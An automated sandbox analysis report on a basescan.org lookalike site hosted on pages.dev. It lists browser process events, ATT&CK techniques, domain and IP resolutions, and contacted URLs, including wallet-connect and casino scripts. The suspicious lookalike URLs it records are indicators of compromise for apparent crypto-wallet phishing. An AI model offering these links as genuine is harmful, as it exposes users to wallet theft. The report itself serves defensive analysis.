            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5260 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management Instrumentation1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/19%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            fp2e7a.wpc.phicdn.net0%VirustotalBrowse
            pixel.prdredir.com0%VirustotalBrowse
            event.getblue.io0%VirustotalBrowse
            relay.walletconnect.org0%VirustotalBrowse
            scripts.mediamathrdrt.com0%VirustotalBrowse
            collect.verify.lnearn.com0%VirustotalBrowse
            a.ixncdn.com0%VirustotalBrowse
            stats-dss4061-serving.com0%VirustotalBrowse
            basescan.org0%VirustotalBrowse
            jsdelivr.map.fastly.net0%VirustotalBrowse
            socket2v2.bcgame.sk0%VirustotalBrowse
            cm.g.doubleclick.net0%VirustotalBrowse
            www.google.com0%VirustotalBrowse
            api.web3modal.com0%VirustotalBrowse
            goto.etherscan.com0%VirustotalBrowse
            js.sentry-cdn.com0%VirustotalBrowse
            api.hypelab.com0%VirustotalBrowse
            adssistem.com0%VirustotalBrowse
            cdnjs.cloudflare.com0%VirustotalBrowse
            dualstack.com.imgix.map.fastly.net0%VirustotalBrowse
            pubads.g.doubleclick.uk.net0%VirustotalBrowse
            eas.etherscan.com0%VirustotalBrowse
            api.hcaptcha.com0%VirustotalBrowse
            insights.rtgio.co0%VirustotalBrowse
            a.nel.cloudflare.com0%VirustotalBrowse
            bcgame.sk0%VirustotalBrowse
            widget.getblue.io0%VirustotalBrowse
            bg.microsoft.map.fastly.net0%VirustotalBrowse
            my.rtmark.net0%VirustotalBrowse
            rtgio.co0%VirustotalBrowse
            pixel.mediamathrdrt.com0%VirustotalBrowse
            www.walletlink.org0%VirustotalBrowse
            tracking.aimetric.net0%VirustotalBrowse
            relay.walletconnect.com0%VirustotalBrowse
            basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev19%VirustotalBrowse
            js.hcaptcha.com0%VirustotalBrowse
            nstrp.adform.net0%VirustotalBrowse
            d107ul3j3wrui0.cloudfront.net0%VirustotalBrowse
            scripts.prdredir.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://openjsf.org/0%URL Reputationsafe
            http://underscorejs.org/LICENSE0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            jsdelivr.map.fastly.net
            151.101.65.229
            truefalseunknown
            a.ixncdn.com
            146.190.146.237
            truefalseunknown
            basescan.org
            104.26.13.113
            truefalseunknown
            relay.walletconnect.org
            3.126.230.177
            truefalseunknown
            pixel.prdredir.com
            104.18.31.27
            truefalseunknown
            collect.verify.lnearn.com
            13.32.99.32
            truefalseunknown
            scripts.mediamathrdrt.com
            104.21.94.142
            truefalseunknown
            stats-dss4061-serving.com
            167.235.116.131
            truefalseunknown
            event.getblue.io
            18.229.151.144
            truefalseunknown
            fp2e7a.wpc.phicdn.net
            192.229.221.95
            truefalseunknown
            js.sentry-cdn.com
            151.101.130.217
            truefalseunknown
            cdnjs.cloudflare.com
            104.17.25.14
            truefalseunknown
            socket2v2.bcgame.sk
            104.18.8.186
            truefalseunknown
            cm.g.doubleclick.net
            142.250.185.162
            truefalseunknown
            www.google.com
            142.250.184.196
            truefalseunknown
            api.web3modal.com
            104.18.29.72
            truefalseunknown
            api.hypelab.com
            188.114.96.3
            truefalseunknown
            dualstack.com.imgix.map.fastly.net
            151.101.2.208
            truefalseunknown
            adssistem.com
            188.114.97.3
            truefalseunknown
            goto.etherscan.com
            104.26.8.188
            truefalseunknown
            a.nel.cloudflare.com
            35.190.80.1
            truefalseunknown
            eas.etherscan.com
            172.67.69.250
            truefalseunknown
            api.hcaptcha.com
            104.19.229.21
            truefalseunknown
            pubads.g.doubleclick.uk.net
            188.114.97.3
            truefalseunknown
            insights.rtgio.co
            172.67.145.125
            truefalseunknown
            www.walletlink.org
            104.18.37.8
            truefalseunknown
            relay.walletconnect.com
            3.66.52.205
            truefalseunknown
            widget.getblue.io
            18.229.151.144
            truefalseunknown
            bcgame.sk
            104.18.9.186
            truefalseunknown
            my.rtmark.net
            139.45.195.8
            truefalseunknown
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalseunknown
            pixel.mediamathrdrt.com
            172.67.136.218
            truefalseunknown
            basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
            172.66.47.85
            truefalseunknown
            js.hcaptcha.com
            104.19.229.21
            truefalseunknown
            nstrp.adform.net
            37.157.6.245
            truefalseunknown
            rtgio.co
            172.67.145.125
            truefalseunknown
            tracking.aimetric.net
            188.114.97.3
            truefalseunknown
            newassets.hcaptcha.com
            104.19.230.21
            truefalse
              unknown
              ib.anycast.adnxs.com
              185.89.210.20
              truefalse
                unknown
                c.ixncdn.com
                66.241.125.143
                truefalse
                  unknown
                  scripts.prdredir.com
                  104.18.30.27
                  truefalseunknown
                  socketv2.bcgame.sk
                  104.18.8.186
                  truefalse
                    unknown
                    d107ul3j3wrui0.cloudfront.net
                    143.204.205.213
                    truefalseunknown
                    pixel-us-fvmarketing.ubidex.xyz
                    88.214.195.102
                    truefalse
                      unknown
                      cms.getblue.io
                      54.207.213.8
                      truefalse
                        unknown
                        cdn.jsdelivr.net
                        unknown
                        unknownfalse
                          unknown
                          bc.imgix.net
                          unknown
                          unknownfalse
                            unknown
                            s2.adform.net
                            unknown
                            unknownfalse
                              unknown
                              cdn.ethers.io
                              unknown
                              unknownfalse
                                unknown
                                a1.adform.net
                                unknown
                                unknownfalse
                                  unknown
                                  b.ixncdn.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    metrics.aimetric.net
                                    unknown
                                    unknownfalse
                                      unknown
                                      pixel-us.convertagain.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        ib.adnxs.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlfalse
                                            unknown
                                            https://cm.g.doubleclick.net/pixel?google_nid=coveny_limited&google_cm&&google_sc&ckid=FBF29D6B-8D6B-4B57-BA2CA3A83CC08BD3&cid=A0CFAC1E-B13F-B1FB-FE4BEDC860AA7E5B&google_ula=6572934421&ula=6572934421&google_hm=RkJGMjlENkItOEQ2Qi00QjU3LUJBMkNBM0E4M0NDMDhCRDM&blueID=d699c8fb-0495-44e7-bb4e-319fe1118aff&process_consent=Tfalse
                                              unknown
                                              https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/loaderImage.giffalse
                                                unknown
                                                https://bcgame.sk/assets/Bingo.page-I1m2tVcx.jsfalse
                                                  unknown
                                                  https://bcgame.sk/modules/account2/assets/useGoogleLogin-5a174152.jsfalse
                                                    unknown
                                                    https://bcgame.sk/modules/bonus2/assets/index-3c725725.jsfalse
                                                      unknown
                                                      https://bcgame.sk/assets/_basePropertyOf-BhSQSS-6.jsfalse
                                                        unknown
                                                        https://bc.imgix.net/game/image/90ba079bba.png?_v=4&auto=format&dpr=1&w=200false
                                                          unknown
                                                          https://bcgame.sk/assets/cryptoonlinecasino-BNazf07S.jsfalse
                                                            unknown
                                                            https://bcgame.sk/modules/bonus2/assets/_MapCache-1fb5cc44.jsfalse
                                                              unknown
                                                              https://basescan.org/assets/vendor/font-awesome/webfonts/fa-solid-900.ttffalse
                                                                unknown
                                                                https://bc.imgix.net/game/image/fab0e3ca6b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100false
                                                                  unknown
                                                                  https://d107ul3j3wrui0.cloudfront.net/up/script_asset/710c81a103.jsfalse
                                                                    unknown
                                                                    https://api.web3modal.com/getWalletImage/7677b54f-3486-46e2-4e37-bf8747814f00false
                                                                      unknown
                                                                      https://basescan.org/assets/js/custom/web3.min.js?v=0.5.2.2false
                                                                        unknown
                                                                        https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/modules.jsfalse
                                                                          unknown
                                                                          https://newassets.hcaptcha.com/c/c2e3bd8c1a9aac93490fb6f6645657b5466b5b928b1bcf2109a7a9e1f21e35be/hsw.jsfalse
                                                                            unknown
                                                                            https://api.hypelab.com/v1/requestsfalse
                                                                              unknown
                                                                              https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/z0emk-akw98-t47wk.jsfalse
                                                                                unknown
                                                                                https://basescan.org/jss/ace/mode-csharp.jsfalse
                                                                                  unknown
                                                                                  https://bcgame.sk/modules/bonus2/assets/http-f4555b94.jsfalse
                                                                                    unknown
                                                                                    https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.jsfalse
                                                                                      unknown
                                                                                      https://api.web3modal.com/public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00false
                                                                                        unknown
                                                                                        https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.cssfalse
                                                                                          unknown
                                                                                          https://bcgame.sk/assets/sports-C-mawjC1.pngfalse
                                                                                            unknown
                                                                                            https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.jsfalse
                                                                                              unknown
                                                                                              https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/modules.jsfalse
                                                                                                unknown
                                                                                                https://basescan.org/assets/js/components/hs.focus-state.js?v=24.4.4.9false
                                                                                                  unknown
                                                                                                  https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/styles.cssfalse
                                                                                                    unknown
                                                                                                    https://bcgame.sk/coin/POL.black.pngfalse
                                                                                                      unknown
                                                                                                      https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.cssfalse
                                                                                                        unknown
                                                                                                        https://pubads.g.doubleclick.uk.net/images/delivery/14683b0b96893296ed98.pngfalse
                                                                                                          unknown
                                                                                                          https://bcgame.sk/modules/bonus2/assets/animate-number-f0294c10.jsfalse
                                                                                                            unknown
                                                                                                            https://bcgame.sk/coin/SOL.black.pngfalse
                                                                                                              unknown
                                                                                                              https://bcgame.sk/modules/bonus2/assets/_baseFor-3fee30d6.jsfalse
                                                                                                                unknown
                                                                                                                https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.cssfalse
                                                                                                                  unknown
                                                                                                                  https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.giffalse
                                                                                                                    unknown
                                                                                                                    https://basescan.org/assets/js/hs.core.js?v=24.4.4.9false
                                                                                                                      unknown
                                                                                                                      https://bcgame.sk/modules/bonus2/assets/sounds-2c4b6e58.jsfalse
                                                                                                                        unknown
                                                                                                                        https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.cssfalse
                                                                                                                          unknown
                                                                                                                          https://bcgame.sk/assets/workbox-window.prod.es5-Cr_0OO2S.jsfalse
                                                                                                                            unknown
                                                                                                                            https://bcgame.sk/modules/bonus2/assets/_baseGetTag-c2e287b9.jsfalse
                                                                                                                              unknown
                                                                                                                              https://basescan.org/images/gen/cons_20.pngfalse
                                                                                                                                unknown
                                                                                                                                https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.jsfalse
                                                                                                                                  unknown
                                                                                                                                  https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.cssfalse
                                                                                                                                    unknown
                                                                                                                                    https://socket2v2.bcgame.sk/test/?p=0119236340112false
                                                                                                                                      unknown
                                                                                                                                      https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/840013fd8c2ab234.cssfalse
                                                                                                                                        unknown
                                                                                                                                        https://basescan.org/assets/js/components/hs.header.js?v=24.4.4.9false
                                                                                                                                          unknown
                                                                                                                                          https://bc.imgix.net/game/image/b0543d5f29.png?_v=4&auto=format&dpr=1&w=200false
                                                                                                                                            unknown
                                                                                                                                            https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/style.cssfalse
                                                                                                                                              unknown
                                                                                                                                              https://bcgame.sk/modules/lottery2/remoteEntry.jsfalse
                                                                                                                                                unknown
                                                                                                                                                https://bcgame.sk/assets/Casino.page-BK1IC-Vp.jsfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://bc.imgix.net/game/image/b5e0fa00d9.png?_v=4&auto=format&dpr=1&w=200false
                                                                                                                                                    unknown
                                                                                                                                                    https://bc.imgix.net/game/image/e992b8c2a1.png?_v=4&auto=format&dpr=1&w=200false
                                                                                                                                                      unknown
                                                                                                                                                      https://bcgame.sk/modules/lottery2/assets/toNumber-e58af95e.jsfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://bcgame.sk/assets/index-CDNrQPXg.jsfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.cssfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://event.getblue.io/r/audience-pixel-std.min.js?v=22false
                                                                                                                                                              unknown
                                                                                                                                                              https://bc.imgix.net/game/image/4d204e0c-db12-471d-8fd6-238df2c36ea1.png?_v=4&auto=format&dpr=1&w=200false
                                                                                                                                                                unknown
                                                                                                                                                                https://bcgame.sk/assets/c9-CnE9qdtZ.pngfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://bcgame.sk/coin/BNB.black.pngfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://d107ul3j3wrui0.cloudfront.net/up/asset/9abd3edefa/78e9993f77.png?w=728&h=90false
                                                                                                                                                                      unknown
                                                                                                                                                                      https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/images/svg/brands/walletconnect.svgfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/style.cssfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://bcgame.sk/modules/bonus2/assets/init-433d720f.jsfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://bcgame.sk/assets/logo/logo.pngfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://bcgame.sk/coin/BTC.black.pngfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://bc.imgix.net/game/image/8a83305a67.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100false
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://socketv2.bcgame.sk/test/?p=011923633d4ebfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://bcgame.sk/modules/account2/assets/i18n-78ff9edb.jsfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://bcgame.sk/coin/XRP.black.pngfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://basescan.org/assets/vendor/fancybox/jquery.fancybox.min.css?v=24.4.4.9false
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://bc.imgix.net/game/image/93329c6f8b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100false
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://basescan.org/assets/vendor/font-awesome/webfonts/fa-solid-900.woff2false
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.cssfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://bcgame.sk/assets/cryptoonlinecasino-BSAtOS-4.jsfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://api.hcaptcha.com/checksiteconfig?v=70b4624&host=bcgame.sk&sitekey=cf0b9a27-82e3-42fb-bfec-562f8045e495&sc=1&swa=1&spst=1false
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                        https://chrome.google.com/webstore/detail/okx-wallet/mcohilncbfahbmgdjkbpemcciiolgcgechromecache_444.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://bc.imgix.net/reward_type/38/9e/0f/168026392089669.pngchromecache_944.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://disqus.com/?ref_noscriptchromecache_345.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://github.com/twbs/bootstrap/graphs/contributors)chromecache_495.2.dr, chromecache_978.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://cdn.jsdelivr.net/npm/web3chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://bc.imgix.net/reward_type/76/31/2a/167987959420881.pngchromecache_944.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknnchromecache_444.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://etherscan.io/chromecache_345.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://bc.imgix.net/reward_type/ee/7b/e4/167987962424663.pngchromecache_944.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://openjsf.org/chromecache_883.2.dr, chromecache_385.2.drfalse
                                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://codecanyon.net/licenses)chromecache_685.2.dr, chromecache_915.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://goto.etherscan.com/rd/MN32WBX5YSTMGG812VZRIGU57chromecache_345.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://underscorejs.org/LICENSEchromecache_883.2.dr, chromecache_385.2.drfalse
                                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://info.etherscan.com/what-is-verify-address-ownership/chromecache_345.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://chrome.google.com/webstore/detail/trust-wallet/egjidjbpglichdcondbcbdnbeeppgdphchromecache_444.2.drfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://play.google.com/store/apps/details?id=io.metamaskchromecache_444.2.drfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://fancyapps.com/fancybox/chromecache_432.2.dr, chromecache_477.2.drfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://t.me/pepe_ERC20ichromecache_345.2.drfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://bkapp.vipchromecache_444.2.drfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://github.com/dankogai/js-base64/issues/130chromecache_664.2.dr, chromecache_668.2.drfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://bc.imgix.net/reward_type/ec9bd1c9dc.pngchromecache_944.2.drfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              18.229.254.104
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              151.101.130.217
                                                                                                                                                                                                                                              js.sentry-cdn.comUnited States
                                                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                                                              88.214.195.102
                                                                                                                                                                                                                                              pixel-us-fvmarketing.ubidex.xyzUnited Kingdom
                                                                                                                                                                                                                                              46636NATCOWEBUSfalse
                                                                                                                                                                                                                                              3.66.52.205
                                                                                                                                                                                                                                              relay.walletconnect.comUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              104.19.230.21
                                                                                                                                                                                                                                              newassets.hcaptcha.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              185.89.210.20
                                                                                                                                                                                                                                              ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                              35.190.80.1
                                                                                                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              142.250.184.196
                                                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              37.157.6.245
                                                                                                                                                                                                                                              nstrp.adform.netDenmark
                                                                                                                                                                                                                                              198622ADFORMDKfalse
                                                                                                                                                                                                                                              104.26.8.188
                                                                                                                                                                                                                                              goto.etherscan.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              66.241.125.143
                                                                                                                                                                                                                                              c.ixncdn.comUnited States
                                                                                                                                                                                                                                              36351SOFTLAYERUSfalse
                                                                                                                                                                                                                                              13.32.99.32
                                                                                                                                                                                                                                              collect.verify.lnearn.comUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              172.66.47.85
                                                                                                                                                                                                                                              basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              104.18.8.186
                                                                                                                                                                                                                                              socket2v2.bcgame.skUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                                              104.18.37.8
                                                                                                                                                                                                                                              www.walletlink.orgUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              188.114.97.3
                                                                                                                                                                                                                                              adssistem.comEuropean Union
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              172.67.145.125
                                                                                                                                                                                                                                              insights.rtgio.coUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              104.18.30.27
